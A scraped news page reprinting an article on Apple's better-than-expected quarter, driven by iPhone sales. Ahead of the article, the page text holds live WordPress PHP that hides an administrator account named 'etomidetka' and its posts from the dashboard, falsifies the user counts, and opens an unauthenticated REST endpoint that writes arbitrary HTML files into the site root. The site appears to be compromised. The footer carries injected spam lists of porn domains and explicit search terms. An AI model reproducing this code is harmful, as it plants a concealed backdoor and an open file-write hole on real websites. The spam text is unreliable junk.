//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } Apple reports better-than-expected quarter driven by iPhone sales – Ebene Media
Home Actu Apple reports better-than-expected quarter driven by iPhone sales
Actu

Apple reports better-than-expected quarter driven by iPhone sales

Apple reports better-than-expected quarter driven by iPhone sales

Apple reported second-fiscal quarter earnings on Thursday that beat Wall Street’s soft expectations, driven by stronger-than-anticipated iPhones sales. Apple CEO Tim Cook told CNBC that the quarter was « better than we expected. »Â  However, Apple’s overall sales fell for the second quarter in a row.  Apple shares rose nearly 2% in extended trading, and continued climbing when Apple gave forecast data points about the current quarter. Apple reported $24.16 billion in net income during the quarter versus $25.01 billion last year. Overall revenue was down 3% from last year’s $97.28 billion in sales. Apple didn’t provide formal guidance, continuing its practice that dates back to 2020 and the start of the Covid-19 pandemic. Management typically provides some data points on a call with analysts. Apple finance chief Luca Maestri said that Apple expects overall revenue in the current quarter to decline about 3%. « We expect our June quarter year-over-year revenue performance to be similar to the March quarter assuming that the macroeconomic outlook does not worsen from what we are projecting today for the current quarter, » Maestri said on a call with analysts. Maestri added that the company is facing macroeconomic challenges in digital advertising and mobile gaming, which is part of Apple’s services business. The highlight of Apple’s report was iPhone sales, which grew from the year-ago quarter even as the broader smartphone industry contracted nearly 15% during the same time, according to an IDC estimate.   IPhone revenue grew 2% during the quarter, suggesting that parts shortages and supply chain issues that had hampered the product for the last few years, including an iPhone factory shutdown late last year, had finally abated.   « It was quite a good quarter from an iPhone point of view, particularly relative to the market when you look at the market stats, » Cook told CNBC’s Steve Kovach.   Apple’s Mac and iPad businesses didn’t fare as well. The company warned last quarter that both business segments would decline, partially due to parts shortages, but they decreased more than expectations.   Apple’s Mac business fell more than 31% to just over $7.17 billion. But it’s a difficult comparison versus the same time last year when Apple was still benefiting from the end of a pandemic boom in PC sales and a shift to its own chips that offer longer laptop battery life.   « There’s really two reasons for that, » Cook said. « One is the macro situation in general. And the other is where we’re still comparing to the very difficult compare of the M1 MacBook Pro 14 and 16-inch from the year-ago quarter. »Â  Apple’s Services business includes monthly subscriptions, revenue from Apple’s App Store, warranties, and search licensing revenue from companies like Google. Apple reported $20.9 billion in services revenue, a 5.45% annual increase, showing that the company’s most highest-margin line of business continues to grow.   Apple’s wearables division, including Apple Watch and headphones such as AirPods, dropped 1% during the quarter, beating analyst expectations. Last fall, Apple released a more expensive Apple Watch, called Ultra.   Apple’s greater China business, which includes Taiwan and Hong Kong in addition to the mainland, reported $17.81 billion in sales, down from last year’s $18.34 billion. Analysts had hoped that China’s demand for electronics would rise this year as the company exits out of Covid-era lockdowns and other restrictions.   While sales shrunk in most regions that Apple monitors, they grew in its Asia Pacific region to $8.11 billion. Cook was optimistic about Apple’s prospects in India. Cook visited India last month to open Apple stores and meet with politicians.   « The switcher and first-time buyer metrics look very good there for India, » Cook said. Apple uses the term « switcher » to refer to first-time iPhone buyers who previously had Android devices.   As expected, Apple’s board authorized $90 billion in share repurchases and dividends. Apple said it paid $23 billion in buybacks and dividends in the March quarter. Apple also raised its dividend 4% to 24 cents per share.   Cook also said that Apple was not planning layoffs like those that other big tech companies have started over the past year.   « I view that as a last resort and, so, mass layoffs is not something that we’re talking about at this moment, » Cook said.   Data is a real-time snapshot *Data is delayed at least 15 minutes. Global Business and Financial News, Stock Quotes, and Market Data and Analysis.

Written by
Ebene Media

Toute l'actualité en direct. Retrouvez-nous sur les réseaux sociaux: Abonnez-vous à Youtube: cliquez ici -- Suivez-nous sur Facebook: cliquez ici -- Suivez-nous sur Twitter: cliquez ici -- Suivez-nous sur Tik Tok: cliquez ici

Related Articles

«L’arrêt de l’aide occidentale à Kiev» est une condition pour une trêve en Ukraine – Poutine

La Russie répond positivement à la proposition américaine de renoncer aux frappes...

La bande de Gaza à nouveau plongée dans le chaos, des familles entières anéanties

Au matin du 18 mars, les Palestiniens ont été reveillés par des...

L’adhésion à «l’OTAN ne peut être retirée de l’ordre du jour» : l’Ukraine ne croit pas à la déclaration de Trump

Bien que l’OTAN elle-même commence à parler de l’impossibilité pour l’Ukraine d’adhérer...

L’appel entre Vladimir Poutine et Donald Trump

L’entretien téléphonique entre Donald Trump et Vladimir Poutine aurait commencé à 15...

tamilplay 2018 movie zoztube.mobi sunny leone sex youtube debonairblogs.com porngonzo.mobi marati sexi video iroenose nicehentai.com hentai mirror سكس يبني noodporn.com افلام سكي عربى spance anybunny.mobi indian x videos hd
hindi sexy video photo analpornvids.info girl fuck kashmir aunty sex pornovuku.com masaaldesi افلام سكس صيني yatarab.com سكس بولاندى 友崎りん avgle.mobi パンチラ株式会社 sex vedios in telugu sumotube.mobi free indian aunty porn
sxxvidoes assoass.mobi englishsexvideos hot romance sex videos goodtastemovs.com video sex gana red wape com bigassporntrends.com boobs squeezed فيلم سكس ولد وامه abdulaporno.com سثء ر pubg hentai asiahentai.net fujiko hentai